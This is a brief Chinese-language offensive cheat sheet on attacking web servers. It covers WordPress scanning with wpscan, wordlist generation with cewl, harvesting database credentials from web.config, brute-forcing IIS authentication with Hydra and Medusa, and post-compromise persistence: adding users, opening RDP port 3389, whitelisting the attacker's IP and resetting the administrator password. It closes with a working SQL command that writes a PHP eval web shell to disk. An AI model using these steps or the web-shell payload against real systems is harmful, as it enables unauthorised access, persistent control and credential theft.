碰到wordpress 框架的 使用 kalilinux 裡面的wpscan進行掃描

　　cewl kali自帶的密碼生成工具

　　Cewl介紹:
.
　　cewl是一個ruby應用，爬行指定url的指定深度。也可以跟一個外部連結，結果會返回一個單詞列表，這個列表可以扔到John the ripper工具裡進行密碼破解。cewl還有一個相關的命令列工具應用FAB，它使用相同的元資料提取技術從已下載的列表中建立作者/建立者列表。

　　web.config 儲存著資料庫的資訊

　　資料庫提權：

　　建立使用者 新增使用者到使用者組

　　開啟3389埠

　　開啟防火牆白名單 把自己的ip放進去

　　也可以更改administrator的密碼

　　九頭蛇和美杜莎 可以進行IIS的認證爆破

　　當http頭出現

　　Authorization: Basic MTE6MTE=

　　則說明有IIS認證，用蟻劍連線的時候也需要進行base64編碼 同時加入Authorization: Basic MTE6MTE=

　　資料庫getshell

　　select "<?php eval($_post['cmd']);?>" into outfile "檔案路徑/1.php"